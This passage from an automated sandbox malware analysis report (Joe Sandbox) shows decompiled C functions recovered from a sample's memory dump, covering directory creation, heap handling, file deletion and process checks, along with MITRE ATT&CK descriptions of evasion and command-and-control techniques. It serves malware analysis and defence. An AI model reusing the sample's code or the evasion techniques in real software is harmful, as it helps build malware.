								} else {
									goto L8;
								}
							} else {
								if(CreateDirectoryW( &_v524, 0) != 0 || GetLastError() == 0xb7) {
									goto L8;
								} else {
									L6:
									return 0;
								}
							}
						}
						goto L10;
						L8:
					} while ( *(_t21 + 0xe8c7c0) != 0);
					goto L9;
				}
				L10:
			}

0x00e818e8
0x00e818f9
0x00e8195e
0x00e81967
0x00e818fb
0x00e818fb
0x00e81900
0x00e81900
0x00e81900
0x00e81907
0x00e8190a
0x00e81915
0x00000000
0x00e81917
0x00e8191e
0x00e81927
0x00e81952
0x00000000
0x00000000
0x00000000
0x00000000
0x00e81929
0x00e8193a
0x00000000
0x00e81949
0x00e81949
0x00e8194f
0x00e8194f
0x00e8193a
0x00e81927
0x00000000
0x00e81954
0x00e81954
0x00000000
0x00e81900
0x00000000

APIs

memset.NTDLL ref: 00E818E8
GetFileAttributesW.KERNEL32(?), ref: 00E8191E
CreateDirectoryW.KERNEL32(?,00000000), ref: 00E81932
GetLastError.KERNEL32 ref: 00E8193C

Memory Dump Source

Source File: 00000000.00000002.197161113.0000000000E81000.00000020.00020000.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.197156447.0000000000E80000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.197170815.0000000000E8B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.197175636.0000000000E8C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.197180237.0000000000E8D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_0HvIGwMmBV.jbxd

Yara matches

Similarity

API ID: AttributesCreateDirectoryErrorFileLastmemset
String ID:
API String ID: 528582180-0
Opcode ID: 02f7a1a04c57cca5f317a1e9726cafcfc589ffeba1af8edd85893398d37d3a74
Instruction ID: 79fba18e99de52318f795996dd8346f8d4062e3141ff09983fd56be81f2a3f97
Opcode Fuzzy Hash: 02f7a1a04c57cca5f317a1e9726cafcfc589ffeba1af8edd85893398d37d3a74
Instruction Fuzzy Hash: 7E01F5319003054ADB60ABB4AC4C7E6736CEB45718F1006D6E96CF30D1E775A88A87D1

Uniqueness

Uniqueness Score: -1.00%

Function 00E88B30, Relevance: 6.0, APIs: 4, Instructions: 46
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00E88B30(WCHAR* _a4, intOrPtr* _a8) {
				intOrPtr* _t14;
				intOrPtr* _t19;
				intOrPtr _t24;
				WCHAR* _t25;
				intOrPtr* _t26;

				_t25 = _a4;
				_t10 = _t25 + 0x24;
				_a4 = _t25 + 0x24;
				_t24 = E00E819E0(_t10);
				if( *((intOrPtr*)(_t25 + 0x18)) == GetCurrentProcessId()) {
					L8:
					return 1;
				}
				_t19 = _a8;
				_t14 =  *_t19;
				if(_t14 == 0) {
					L5:
					_t26 = RtlAllocateHeap(GetProcessHeap(), 8, 0x210);
					if(_t26 != 0) {
						_t8 = _t26 + 4; // 0x4
						lstrcpyW(_t8, _a4);
						 *((intOrPtr*)(_t26 + 0x20c)) = _t24;
						 *_t26 =  *_t19;
						 *_t19 = _t26;
					}
					L7:
					goto L8;
				}
				while( *((intOrPtr*)(_t14 + 0x20c)) != _t24) {
					_t14 =  *_t14;
					if(_t14 != 0) {
						continue;
					}
					goto L5;
				}
				goto L7;
			}

0x00e88b34
0x00e88b38
0x00e88b3d
0x00e88b45
0x00e88b50
0x00e88ba3
0x00e88baa
0x00e88baa
0x00e88b53
0x00e88b56
0x00e88b5a
0x00e88b6e
0x00e88b82
0x00e88b86
0x00e88b8b
0x00e88b8f
0x00e88b95
0x00e88b9d
0x00e88b9f
0x00e88b9f
0x00e88ba1
0x00000000
0x00e88ba1
0x00e88b60
0x00e88b68
0x00e88b6c
0x00000000
0x00000000
0x00000000
0x00e88b6c
0x00000000

APIs

GetCurrentProcessId.KERNEL32(00000000,00000000,?,00E8215D,0000022C,00000000,?,?), ref: 00E88B47
GetProcessHeap.KERNEL32(00000008,00000210,00000000,?,00E8215D,0000022C,00000000,?,?), ref: 00E88B75
RtlAllocateHeap.NTDLL(00000000,?,00E8215D), ref: 00E88B7C
lstrcpyW.KERNEL32(00000004,?), ref: 00E88B8F

Memory Dump Source

Source File: 00000000.00000002.197161113.0000000000E81000.00000020.00020000.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.197156447.0000000000E80000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.197170815.0000000000E8B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.197175636.0000000000E8C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.197180237.0000000000E8D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_0HvIGwMmBV.jbxd

Yara matches

Similarity

API ID: HeapProcess$AllocateCurrentlstrcpy
String ID:
API String ID: 2952365268-0
Opcode ID: bb9b5240428dc383bf54aa176e16bf10bfc351b6cf39bce240e5a599f7223f77
Instruction ID: f9909505207972f2778a7a3c503bc0de1803e479e992172f5a9b53596e73c52e
Opcode Fuzzy Hash: bb9b5240428dc383bf54aa176e16bf10bfc351b6cf39bce240e5a599f7223f77
Instruction Fuzzy Hash: 6A018C756017049FCB209F6AD888A86B7E8FF85744B648569FD4DE7251DB30E844CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00E884C0, Relevance: 6.0, APIs: 4, Instructions: 44
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00E884C0(intOrPtr __ecx, void* __edx, long* _a4) {
				intOrPtr _v8;
				void* _t5;
				void* _t11;
				void* _t17;

				_t16 = _a4;
				_t11 = __edx;
				_v8 = __ecx;
				_t5 = RtlAllocateHeap(GetProcessHeap(), 0,  *_a4);
				_t17 = _t5;
				if(_t17 == 0) {
					return _t5;
				} else {
					if(E00E82D80(_t17, _t16, _v8, _t11) == 0) {
						return _t17;
					}
					HeapFree(GetProcessHeap(), 0, _t17);
					return 0;
				}
			}

0x00e884c9
0x00e884cc
0x00e884ce
0x00e884dc
0x00e884e2
0x00e884e6
0x00e8851d
0x00e884e8
0x00e884fa
0x00000000
0x00e88515
0x00e88506
0x00e88514
0x00e88514

APIs

GetProcessHeap.KERNEL32(00000000,00E88668,?,?,?,00E88668,?), ref: 00E884D5
RtlAllocateHeap.NTDLL(00000000), ref: 00E884DC

Part of subcall function 00E82D80: memset.NTDLL ref: 00E82D94

GetProcessHeap.KERNEL32(00000000,00000000), ref: 00E884FF
HeapFree.KERNEL32(00000000), ref: 00E88506

Memory Dump Source

Source File: 00000000.00000002.197161113.0000000000E81000.00000020.00020000.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.197156447.0000000000E80000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.197170815.0000000000E8B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.197175636.0000000000E8C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.197180237.0000000000E8D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_0HvIGwMmBV.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocateFreememset
String ID:
API String ID: 1319286391-0
Opcode ID: 39098ef596a556e05fa9bc724dd8259d4230a6e35811e37d0ab02e4403100cac
Instruction ID: d020bbb59fbeb7b334b5bb725a90fea1b99c968b6eca1a70fb9651eb3410ebb4
Opcode Fuzzy Hash: 39098ef596a556e05fa9bc724dd8259d4230a6e35811e37d0ab02e4403100cac
Instruction Fuzzy Hash: B2F0F636B011146FDA0067AA7C4D65EFBADDF85667F100062FD0CE2211E9318D1447F1

Uniqueness

Uniqueness Score: -1.00%

Function 00E81970, Relevance: 6.0, APIs: 4, Instructions: 31
memoryfileCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E00E81970() {
				void* _v8;
				short _v528;
				void* _t15;

				E00E81830(0xe81010, 0x14, 0x41ce18c7,  &_v8);
				_t15 = _v8;
				 *0xe8c200( &_v528, 0x104, _t15, 0xe8c7c0, _t15);
				HeapFree(GetProcessHeap(), 0, _t15);
				return DeleteFileW( &_v528);
			}

0x00e8198d
0x00e81992
0x00e819a8
0x00e819bb
0x00e819d2

APIs

Part of subcall function 00E81830: GetProcessHeap.KERNEL32(00000008,00E89F6B,00000000,00000000,00E81004,?,00E815F4,4DBAC13F,00E89F6B,?,00000000), ref: 00E81844
Part of subcall function 00E81830: RtlAllocateHeap.NTDLL(00000000,?,00E815F4), ref: 00E8184B

_snwprintf.NTDLL ref: 00E819A8
GetProcessHeap.KERNEL32(00000000,00E89730), ref: 00E819B4
HeapFree.KERNEL32(00000000), ref: 00E819BB
DeleteFileW.KERNEL32(?), ref: 00E819C8

Memory Dump Source

Source File: 00000000.00000002.197161113.0000000000E81000.00000020.00020000.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.197156447.0000000000E80000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.197170815.0000000000E8B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.197175636.0000000000E8C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.197180237.0000000000E8D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_0HvIGwMmBV.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocateDeleteFileFree_snwprintf
String ID:
API String ID: 135842935-0
Opcode ID: 7b3f21d63c8f2337a257aa374955d3980c404803936f3297da613047d165905f
Instruction ID: bca27bd421a9ba1845fee53ffeec13f72d2f0412f05a1b3ae001e1e5ce50154c
Opcode Fuzzy Hash: 7b3f21d63c8f2337a257aa374955d3980c404803936f3297da613047d165905f
Instruction Fuzzy Hash: 51F0A7B1901218BBDB10B7A5AC4DFCB7B7CEB06315F200091B90DF2153D6305A098BF1

Uniqueness

Uniqueness Score: -1.00%

Function 00E8A750, Relevance: 6.0, APIs: 4, Instructions: 31
memorysynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00E8A750(long __ecx) {
				int _t3;
				long _t7;
				void* _t9;
				void* _t10;

				_t10 =  *0xe8cbd4; // 0x0
				_t7 = __ecx;
				_t9 = 0xe8cbd4;
				while(_t10 != 0) {
					_t3 = WaitForSingleObject( *(_t10 + 8), _t7);
					if(_t3 == 0x102) {
						_t9 = _t10;
					} else {
						 *_t9 =  *_t10;
						CloseHandle( *(_t10 + 8));
						_t3 = HeapFree(GetProcessHeap(), 0, _t10);
					}
					_t10 =  *_t9;
				}
				return _t3;
			}

0x00e8a752
0x00e8a758
0x00e8a75b
0x00e8a762
0x00e8a768
0x00e8a773
0x00e8a794
0x00e8a775
0x00e8a777
0x00e8a77c
0x00e8a78c
0x00e8a78c
0x00e8a796
0x00e8a798
0x00e8a79f

APIs

WaitForSingleObject.KERNEL32(?,?,00000000,00E89315,00000000,00E8928E), ref: 00E8A768
CloseHandle.KERNEL32(?,?,00000000,00E89315,00000000,00E8928E), ref: 00E8A77C
GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00E89315,00000000,00E8928E), ref: 00E8A785
HeapFree.KERNEL32(00000000,?,00000000,00E89315,00000000,00E8928E), ref: 00E8A78C

Memory Dump Source

Source File: 00000000.00000002.197161113.0000000000E81000.00000020.00020000.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.197156447.0000000000E80000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.197170815.0000000000E8B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.197175636.0000000000E8C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.197180237.0000000000E8D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_0HvIGwMmBV.jbxd

Yara matches

Similarity

API ID: Heap$CloseFreeHandleObjectProcessSingleWait
String ID:
API String ID: 1931067520-0
Opcode ID: 8d64074a762534b6f3254e3e97b6971d54d5c093230626d571ffe67191afea34
Instruction ID: 716d35990d281b0bec8fae8496759029d030fc3416dc2afa9c6d2a5eb51e7169
Opcode Fuzzy Hash: 8d64074a762534b6f3254e3e97b6971d54d5c093230626d571ffe67191afea34
Instruction Fuzzy Hash: C7F0A7325015209FE7222B55DC8D9567779EF4572573C0427F54DF3221C3759C40DBA0

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report 0HvIGwMmBV

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Yara Overview

Initial Sample

Memory Dumps

Unpacked PEs

Sigma Overview

Signature Overview

AV Detection:

Compliance:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Stealing of Sensitive Information:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Imports

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

HTTP Request Dependency Graph

HTTP Packets

Code Manipulations

Statistics

Function 00E89EE0, Relevance: 9.0, APIs: 6, Instructions: 40
memoryCOMMON

Function 00E815B0, Relevance: 38.6, APIs: 21, Strings: 1, Instructions: 133
memorysynchronizationprocessCOMMON

Function 00E81599, Relevance: 15.1, APIs: 10, Instructions: 86
memorysynchronizationCOMMON

Function 00E81575, Relevance: 13.6, APIs: 9, Instructions: 73
memorysynchronizationCOMMON

Function 00E81F40, Relevance: 9.2, APIs: 6, Instructions: 163
librarymemoryloaderCOMMON

Function 00E82110, Relevance: 6.0, APIs: 4, Instructions: 39
processCOMMON

Function 00E86E70, Relevance: 4.2, APIs: 3, Instructions: 428
COMMONCrypto

Function 00E877F0, Relevance: .6, Instructions: 581
COMMONCrypto

Function 00E81BE0, Relevance: .0, Instructions: 50
COMMON

Function 00E8A3A0, Relevance: 49.2, APIs: 27, Strings: 1, Instructions: 225
memoryfileprocessCOMMON